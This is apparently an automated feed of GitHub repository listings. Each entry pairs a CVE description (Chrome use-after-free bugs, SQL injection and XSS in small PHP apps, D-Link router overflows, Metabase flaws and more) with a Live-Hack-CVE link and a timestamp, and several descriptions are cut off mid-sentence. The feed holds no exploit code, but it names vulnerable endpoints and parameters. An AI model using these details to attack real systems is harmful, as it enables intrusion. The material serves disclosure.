**Use after free in Extensions in Google Chrome prior to 104.0.5112.79 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via specific UI interactions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2621](https://github.com/Live-Hack-CVE/CVE-2022-2621) create time: 2022-12-28T19:11:10Z

**Use after free in Input in Google Chrome on Chrome OS prior to 104.0.5112.79 allowed a remote attacker who convinced a user to enage in specific user interactions to potentially exploit heap corruption via specific UI interactions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2613](https://github.com/Live-Hack-CVE/CVE-2022-2613) create time: 2022-12-28T19:11:04Z

**Use after free in SwiftShader in Google Chrome prior to 104.0.5112.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2854](https://github.com/Live-Hack-CVE/CVE-2022-2854) create time: 2022-12-28T19:11:00Z

**Found a potential security vulnerability inside the Pandora API. Affected Pandora FMS version range: all versions of NG version, up to OUM 759. This vulnerability could allow an attacker with authenticated IP to inject SQL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0507](https://github.com/Live-Hack-CVE/CVE-2022-0507) create time: 2022-12-28T19:10:57Z

**A stored cross-site scripting (XSS) vulnerability in the upload function of /admin/show.php allows attackers to execute arbitrary web scripts or HTML via a crafted image file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25574](https://github.com/Live-Hack-CVE/CVE-2022-25574) create time: 2022-12-28T19:10:42Z

**Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 104.0.5112.101 allowed a remote attacker to arbitrarily browse to a malicious website via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2856](https://github.com/Live-Hack-CVE/CVE-2022-2856) create time: 2022-12-28T19:10:38Z

**Use after free in Chrome OS Shell in Google Chrome prior to 104.0.5112.101 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via specific UI interactions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2859](https://github.com/Live-Hack-CVE/CVE-2022-2859) create time: 2022-12-28T19:10:34Z

**Use after free in Sign-In Flow in Google Chrome prior to 104.0.5112.101 allowed a remote attacker to potentially exploit heap corruption via specific UI interaction. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2858](https://github.com/Live-Hack-CVE/CVE-2022-2858) create time: 2022-12-28T19:10:30Z

**Use after free in Blink in Google Chrome prior to 104.0.5112.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2857](https://github.com/Live-Hack-CVE/CVE-2022-2857) create time: 2022-12-28T19:10:14Z

**A vulnerability has been identified in Siemens APOGEE PXC and TALON TC BACnet Automation Controllers in all versions <V3.5. A directory traversal vulnerability could allow a remote attacker with network access to the integrated web server (80/tcp and 443/tcp) to obtain information on the structure of the file system of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-9947](https://github.com/Live-Hack-CVE/CVE-2017-9947) create time: 2022-12-28T17:54:21Z

**A vulnerability has been identified in Siemens APOGEE PXC and TALON TC BACnet Automation Controllers in all versions <V3.5. An attacker with network access to the integrated web server (80/tcp and 443/tcp) could bypass the authentication and download sensitive information from the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-9946](https://github.com/Live-Hack-CVE/CVE-2017-9946) create time: 2022-12-28T17:54:17Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3641](https://github.com/Live-Hack-CVE/CVE-2017-3641) create time: 2022-12-28T17:44:57Z

**In the add_match function in libbb/lineedit.c in BusyBox through 1.27.2, the tab autocomplete feature of the shell, used to get a list of filenames in a directory, does not sanitize filenames and results in executing any escape sequence in the terminal. This could potentially result in code execution, arbitrary file wr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16544](https://github.com/Live-Hack-CVE/CVE-2017-16544) create time: 2022-12-28T17:44:35Z

**An issue has been found in third-party PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow in the function get_token in pnm2png.c in pnm2png. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-14550](https://github.com/Live-Hack-CVE/CVE-2018-14550) create time: 2022-12-28T17:53:48Z

**A stack-based buffer overflow in Forcepoint Email Security version 8.5 allows an attacker to craft malicious input and potentially crash a process creating a denial-of-service. While no known Remote Code Execution (RCE) vulnerabilities exist, as with all buffer overflows, the possibility of RCE cannot be completely rul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16530](https://github.com/Live-Hack-CVE/CVE-2018-16530) create time: 2022-12-28T17:45:27Z

**initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13990](https://github.com/Live-Hack-CVE/CVE-2019-13990) create time: 2022-12-28T17:53:45Z

**Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.18 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Client. Succes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2922](https://github.com/Live-Hack-CVE/CVE-2020-2922) create time: 2022-12-28T17:52:46Z

**XStream before version 1.4.14 is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected. Anyone using XStream's Security Framework allowlist is not affected. The lin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26217](https://github.com/Live-Hack-CVE/CVE-2020-26217) create time: 2022-12-28T17:52:42Z

**The Micro Air Vehicle Link (MAVLink) protocol presents authentication mechanisms on its version 2.0 however according to its documentation, in order to maintain backwards compatibility, GCS and autopilot negotiate the version via the AUTOPILOT_VERSION message. Since this negotiation depends on the answer, an attacker m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10283](https://github.com/Live-Hack-CVE/CVE-2020-10283) create time: 2022-12-28T17:47:09Z

**A crafted JPEG image may lead the JPEG reader to underflow its data pointer, allowing user-controlled data to be written in heap. To a successful to be performed the attacker needs to perform some triage over the heap layout and craft an image with a malicious format and payload. This vulnerability can lead to data cor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3697](https://github.com/Live-Hack-CVE/CVE-2021-3697) create time: 2022-12-28T17:55:13Z

**A crafted 16-bit grayscale PNG image may lead to a out-of-bounds write in the heap area. An attacker may take advantage of that to cause heap data corruption or eventually arbitrary code execution and circumvent secure boot protections. This issue has a high complexity to be exploited as an attacker needs to perform so CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3695](https://github.com/Live-Hack-CVE/CVE-2021-3695) create time: 2022-12-28T17:54:24Z

**A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all de CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41773](https://github.com/Live-Hack-CVE/CVE-2021-41773) create time: 2022-12-28T17:54:13Z

**A heap out-of-bounds write may heppen during the handling of Huffman tables in the PNG reader. This may lead to data corruption in the heap space. Confidentiality, Integrity and Availablity impact may be considered Low as it's very complex to an attacker control the encoding and positioning of corrupted Huffman entries CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3696](https://github.com/Live-Hack-CVE/CVE-2021-3696) create time: 2022-12-28T17:54:09Z

**Another race in XENMAPSPACE_grant_table handling Guests are permitted access to certain Xen-owned pages of memory. The majority of such pages remain allocated / associated with a guest for its entire lifetime. Grant table v2 status pages, however, are de-allocated when a guest switches (back) from v2 to v1. Freeing suc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28701](https://github.com/Live-Hack-CVE/CVE-2021-28701) create time: 2022-12-28T17:54:02Z

**In Bender/ebee Charge Controllers in multiple versions are prone to an RFID leak. The RFID of the last charge event can be read without authentication via the web interface. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34589](https://github.com/Live-Hack-CVE/CVE-2021-34589) create time: 2022-12-28T17:53:03Z

**Yordam Library Information Document Automation product before version 19.02 has an unauthenticated reflected XSS vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45476](https://github.com/Live-Hack-CVE/CVE-2021-45476) create time: 2022-12-28T17:52:56Z

**Yordam Library Information Document Automation product before version 19.02 has an unauthenticated Information disclosure vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45475](https://github.com/Live-Hack-CVE/CVE-2021-45475) create time: 2022-12-28T17:52:13Z

**A code execution vulnerability exists in the DL_Dxf::handleLWPolylineData functionality of Ribbonsoft dxflib 3.17.0. A specially-crafted .dxf file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21897](https://github.com/Live-Hack-CVE/CVE-2021-21897) create time: 2022-12-28T17:51:41Z

**An issue was discovered in the nix crate 0.16.0 and later before 0.20.2, 0.21.x before 0.21.2, and 0.22.x before 0.22.2 for Rust. unistd::getgrouplist has an out-of-bounds write if a user is in more than 16 /etc/groups groups. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45707](https://github.com/Live-Hack-CVE/CVE-2021-45707) create time: 2022-12-28T17:51:27Z

**GNOME gdk-pixbuf 2.42.6 is vulnerable to a heap-buffer overflow vulnerability when decoding the lzw compressed stream of image data in GIF files with lzw minimum code size equals to 12. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44648](https://github.com/Live-Hack-CVE/CVE-2021-44648) create time: 2022-12-28T17:51:01Z

**Hospital Management System v 4.0 is vulnerable to SQL Injection via file:hospital/hms/admin/view-patient.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35387](https://github.com/Live-Hack-CVE/CVE-2021-35387) create time: 2022-12-28T17:50:09Z

**Employee Record Management System v 1.2 is vulnerable to Cross Site Scripting (XSS) via editempprofile.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37781](https://github.com/Live-Hack-CVE/CVE-2021-37781) create time: 2022-12-28T17:49:56Z

**Employee Record Management System v 1.2 is vulnerable to SQL Injection via editempprofile.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37782](https://github.com/Live-Hack-CVE/CVE-2021-37782) create time: 2022-12-28T17:49:26Z

**Hospital Management System v 4.0 is vulnerable to Cross Site Scripting (XSS) via /hospital/hms/admin/patient-search.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35388](https://github.com/Live-Hack-CVE/CVE-2021-35388) create time: 2022-12-28T17:49:23Z

**SEMCMS v 1.1 is vulnerable to SQL Injection via Ant_Pro.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38737](https://github.com/Live-Hack-CVE/CVE-2021-38737) create time: 2022-12-28T17:49:16Z

**SEMCMS Shop V 1.1 is vulnerable to SQL Injection via Ant_Global.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38736](https://github.com/Live-Hack-CVE/CVE-2021-38736) create time: 2022-12-28T17:49:12Z

**SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Menu.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38734](https://github.com/Live-Hack-CVE/CVE-2021-38734) create time: 2022-12-28T17:49:08Z

**Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Themepoints Testimonials plugin <= 2.6 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36858](https://github.com/Live-Hack-CVE/CVE-2021-36858) create time: 2022-12-28T17:48:34Z

**Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in ExpressTech Quiz And Survey Master plugin <= 7.3.4 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36863](https://github.com/Live-Hack-CVE/CVE-2021-36863) create time: 2022-12-28T17:48:31Z

**SEMCMS SHOP v 1.1 is vulnerable to Cross Site Scripting (XSS) via Ant_M_Coup.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38728](https://github.com/Live-Hack-CVE/CVE-2021-38728) create time: 2022-12-28T17:48:14Z

**SEMCMS v 1.2 is vulnerable to SQL Injection via SEMCMS_User.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38217](https://github.com/Live-Hack-CVE/CVE-2021-38217) create time: 2022-12-28T17:48:11Z

**SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Info.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38730](https://github.com/Live-Hack-CVE/CVE-2021-38730) create time: 2022-12-28T17:48:07Z

**SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Plist.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38729](https://github.com/Live-Hack-CVE/CVE-2021-38729) create time: 2022-12-28T17:48:03Z

**SEMCMS SHOP v 1.1 is vulnerable to SQL via Ant_Message.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38732](https://github.com/Live-Hack-CVE/CVE-2021-38732) create time: 2022-12-28T17:47:58Z

**SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Zekou.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38731](https://github.com/Live-Hack-CVE/CVE-2021-38731) create time: 2022-12-28T17:47:55Z

**SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_BlogCat.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38733](https://github.com/Live-Hack-CVE/CVE-2021-38733) create time: 2022-12-28T17:47:51Z

**** DISPUTED ** The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33026](https://github.com/Live-Hack-CVE/CVE-2021-33026) create time: 2022-12-28T17:46:47Z

**libcurl keeps previously used connections in a connection pool for subsequenttransfers to reuse, if one of them matches the setup.Due to errors in the logic, the config matching function did not take 'issuercert' into account and it compared the involved paths *case insensitively*,which could lead to libcurl reusing wr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22924](https://github.com/Live-Hack-CVE/CVE-2021-22924) create time: 2022-12-28T17:46:22Z

**Liblouis through 3.21.0 has a buffer overflow in compilePassOpcode in compileTranslationTable.c (called, indirectly, by tools/lou_checktable.c). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26981](https://github.com/Live-Hack-CVE/CVE-2022-26981) create time: 2022-12-28T17:55:54Z

**D-Link DIR-816 A2 1.10 B05 was discovered to contain multiple command injection vulnerabilities via the admuser and admpass parameters at /goform/setSysAdm. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42999](https://github.com/Live-Hack-CVE/CVE-2022-42999) create time: 2022-12-28T17:55:50Z

**The pyesasky for python, as distributed on PyPI, included a code-execution backdoor inserted by a third party. The current version, without this backdoor, is 1.2.0-1.4.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30885](https://github.com/Live-Hack-CVE/CVE-2022-30885) create time: 2022-12-28T17:55:16Z

**D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the wizardstep4_pskpwd parameter at /goform/form2WizardStep4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43000](https://github.com/Live-Hack-CVE/CVE-2022-43000) create time: 2022-12-28T17:55:10Z

**D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the wizardstep54_pskpwd parameter at /goform/form2WizardStep54. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43002](https://github.com/Live-Hack-CVE/CVE-2022-43002) create time: 2022-12-28T17:55:06Z

**D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the pskValue parameter in the setSecurity function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43001](https://github.com/Live-Hack-CVE/CVE-2022-43001) create time: 2022-12-28T17:55:02Z

**D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the pskValue parameter in the setRepeaterSecurity function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43003](https://github.com/Live-Hack-CVE/CVE-2022-43003) create time: 2022-12-28T17:54:59Z

**Certain Neko-related HTML parsers allow a denial of service via crafted Processing Instruction (PI) input that causes excessive heap memory consumption. In particular, this issue exists in HtmlUnit-Neko through 2.26, and is fixed in 2.27. This issue also exists in CyberNeko HTML through 1.9.22 (also affecting OWASP Ant CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28366](https://github.com/Live-Hack-CVE/CVE-2022-28366) create time: 2022-12-28T17:54:55Z

**A vulnerability classified as critical was found in Axiomatic Bento4. Affected by this vulnerability is an unknown functionality of the file AvcInfo.cpp of the component avcinfo. The manipulation leads to heap-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3665](https://github.com/Live-Hack-CVE/CVE-2022-3665) create time: 2022-12-28T17:54:51Z

**An issue was discovered in the auth component in Dovecot 2.2 and 2.3 before 2.3.20. When two passdb configuration entries exist with the same driver and args settings, incorrect username_filter and mechanism settings can be applied to passdb definitions. These incorrectly applied settings can lead to an unintended secu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30550](https://github.com/Live-Hack-CVE/CVE-2022-30550) create time: 2022-12-28T17:54:48Z

**A vulnerability has been found in Axiomatic Bento4 and classified as problematic. This vulnerability affects the function AP4_AtomFactory::CreateAtomFromStream of the component mp4edit. The manipulation leads to memory leak. The attack can be initiated remotely. The exploit has been disclosed to the public and may be u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3668](https://github.com/Live-Hack-CVE/CVE-2022-3668) create time: 2022-12-28T17:54:45Z

**A vulnerability was found in Axiomatic Bento4. It has been classified as critical. Affected is the function WriteSample of the component mp42hevc. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-212010 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3670](https://github.com/Live-Hack-CVE/CVE-2022-3670) create time: 2022-12-28T17:54:41Z

**A vulnerability was found in Axiomatic Bento4 and classified as problematic. This issue affects the function AP4_AvccAtom::Create of the component mp4edit. The manipulation leads to memory leak. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212009 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3669](https://github.com/Live-Hack-CVE/CVE-2022-3669) create time: 2022-12-28T17:54:38Z

**Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, and 1.42.6, it was possible to circumvent locked parameters when requesting data for a question in an embedded dashboard by constructing a malicious request to the backend. This issue is patched in versions 0.44.5, 1.44.5 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39358](https://github.com/Live-Hack-CVE/CVE-2022-39358) create time: 2022-12-28T17:54:34Z

**Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9, custom GeoJSON map URL address would follow redirects to addresses that were otherwise disallowed, like link-local or private-network. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39359](https://github.com/Live-Hack-CVE/CVE-2022-39359) create time: 2022-12-28T17:54:31Z

**Jenkins Pipeline: Multibranch Plugin 706.vd43c65dec013 and earlier uses the same checkout directories for distinct SCMs for the readTrusted step, allowing attackers with Item/Configure permission to invoke arbitrary OS commands on the controller through crafted SCM contents. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25175](https://github.com/Live-Hack-CVE/CVE-2022-25175) create time: 2022-12-28T17:54:28Z

**Missing permission checks in Jenkins Snow Commander Plugin 1.10 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified webserver using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25193](https://github.com/Live-Hack-CVE/CVE-2022-25193) create time: 2022-12-28T17:54:06Z

**Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9 single sign on (SSO) users were able to do password resets on Metabase, which could allow a user access without going through the SSO IdP. This issue is patched in versions 0.44.5, 1.44.5, 0.43. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39360](https://github.com/Live-Hack-CVE/CVE-2022-39360) create time: 2022-12-28T17:53:59Z

**Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9, H2 (Sample Database) could allow Remote Code Execution (RCE), which can be abused by users able to write SQL queries on H2 databases. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39361](https://github.com/Live-Hack-CVE/CVE-2022-39361) create time: 2022-12-28T17:53:55Z

**Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9, unsaved SQL queries are auto-executed, which could pose a possible attack vector. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9. Metabase CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39362](https://github.com/Live-Hack-CVE/CVE-2022-39362) create time: 2022-12-28T17:53:52Z

**A vulnerability classified as critical has been found in Axiomatic Bento4. Affected is the function AP4_BitStream::WriteBytes of the file Ap4BitStream.cpp of the component avcinfo. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3664](https://github.com/Live-Hack-CVE/CVE-2022-3664) create time: 2022-12-28T17:53:41Z

**A vulnerability was found in Axiomatic Bento4. It has been rated as problematic. This issue affects the function AP4_StsdAtom of the file Ap4StsdAtom.cpp of the component MP4fragment. The manipulation leads to null pointer dereference. The attack may be initiated remotely. The exploit has been disclosed to the public a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3663](https://github.com/Live-Hack-CVE/CVE-2022-3663) create time: 2022-12-28T17:53:38Z

**A vulnerability was found in Axiomatic Bento4. It has been declared as critical. This vulnerability affects the function GetOffset of the file Ap4Sample.h of the component mp42hls. The manipulation leads to use after free. The attack can be initiated remotely. The exploit has been disclosed to the public and may be use CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3662](https://github.com/Live-Hack-CVE/CVE-2022-3662) create time: 2022-12-28T17:53:17Z

**A vulnerability, which was classified as critical, was found in Axiomatic Bento4. This affects the function AP4_MemoryByteStream::WritePartial of the file Ap4ByteStream.cpp of the component mp42aac. The manipulation leads to heap-based buffer overflow. It is possible to initiate the attack remotely. The exploit has bee CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3667](https://github.com/Live-Hack-CVE/CVE-2022-3667) create time: 2022-12-28T17:53:13Z

**OpenHarmony-v3.1.2 and prior versions have a permission bypass vulnerability. Local attackers can bypass permission control and get sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38064](https://github.com/Live-Hack-CVE/CVE-2022-38064) create time: 2022-12-28T17:53:10Z

**OpenHarmony-v3.1.2 and prior versions have an incorrect configuration of the cJSON library, which leads a Stack overflow vulnerability during recursive parsing. LAN attackers can lead a DoS attack to all network devices. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36423](https://github.com/Live-Hack-CVE/CVE-2022-36423) create time: 2022-12-28T17:53:07Z

**A vulnerability classified as problematic has been found in Ruby on Rails. This affects an unknown part of the file actionpack/lib/action_dispatch/middleware/templates/routes/_table.html.erb. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is be177e4 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3704](https://github.com/Live-Hack-CVE/CVE-2022-3704) create time: 2022-12-28T17:52:59Z

**Improper privilege management vulnerability in summary report management in Synology Presto File Server before 2.1.2-1601 allows remote authenticated users to bypass security constraint via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43749](https://github.com/Live-Hack-CVE/CVE-2022-43749) create time: 2022-12-28T17:52:52Z

**Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in file operation management in Synology Presto File Server before 2.1.2-1601 allows remote attackers to write arbitrary files via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43748](https://github.com/Live-Hack-CVE/CVE-2022-43748) create time: 2022-12-28T17:52:49Z

**A vulnerability in the External RESTful Services (ERS) API of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient input validation. An a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20959](https://github.com/Live-Hack-CVE/CVE-2022-20959) create time: 2022-12-28T17:52:38Z

**fish is a command line shell. fish version 3.1.0 through version 3.3.1 is vulnerable to arbitrary code execution. git repositories can contain per-repository configuration that change the behavior of git, including running arbitrary commands. When using the default configuration of fish, changing to a directory automat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20001](https://github.com/Live-Hack-CVE/CVE-2022-20001) create time: 2022-12-28T17:04:21Z

**IBM Rational Asset Manager 7.5 could allow a remote attacker to bypass security restrictions. An attacker could exploit this vulnerability using the UID parameter to modify another user's preferences. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-4820](https://github.com/Live-Hack-CVE/CVE-2011-4820) create time: 2022-12-28T17:09:27Z

**IBM WebSphere MQ 7.1 is vulnerable to a denial of service, caused by an error when handling user ids. A remote attacker could exploit this vulnerability to bypass the security configuration setup on a SVRCONN channel and flood the queue manager. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-2201](https://github.com/Live-Hack-CVE/CVE-2012-2201) create time: 2022-12-28T17:09:23Z

**IBM Rational Change 5.3 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using the SUPP_TEMPLATE_FLAG parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-2160](https://github.com/Live-Hack-CVE/CVE-2012-2160) create time: 2022-12-28T17:09:20Z

**IBM InfoSphere Information Server 8.1, 8.5, and 8,7 could allow a remote authenticated attacker to obtain sensitive information, caused by improper restrictions on directories. An attacker could exploit this vulnerability via the DataStage application to load or import content functionality to view arbitrary files on t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-4818](https://github.com/Live-Hack-CVE/CVE-2012-4818) create time: 2022-12-28T17:09:16Z

**The cdf_read_property_info function in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, does not properly validate a stream offset, which allows remote attackers to cause a denial of service (application crash) via a crafted CDF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3487](https://github.com/Live-Hack-CVE/CVE-2014-3487) create time: 2022-12-28T17:07:47Z

**softmagic.c in file before 5.17 and libmagic allows context-dependent attackers to cause a denial of service (out-of-bounds memory access and crash) via crafted offsets in the softmagic of a PE executable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2270](https://github.com/Live-Hack-CVE/CVE-2014-2270) create time: 2022-12-28T17:07:42Z

**The cdf_count_chain function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, does not properly validate sector-count data, which allows remote attackers to cause a denial of service (application crash) via a crafted CDF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3480](https://github.com/Live-Hack-CVE/CVE-2014-3480) create time: 2022-12-28T17:07:39Z

**The cdf_check_stream_offset function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, relies on incorrect sector-size data, which allows remote attackers to cause a denial of service (application crash) via a crafted stream offset in a CDF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3479](https://github.com/Live-Hack-CVE/CVE-2014-3479) create time: 2022-12-28T17:07:35Z

**huft_build in archival/libarchive/decompress_gunzip.c in BusyBox before 1.27.2 misuses a pointer, causing segfaults and an application crash during an unzip operation on a specially crafted ZIP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-9261](https://github.com/Live-Hack-CVE/CVE-2015-9261) create time: 2022-12-28T17:06:54Z

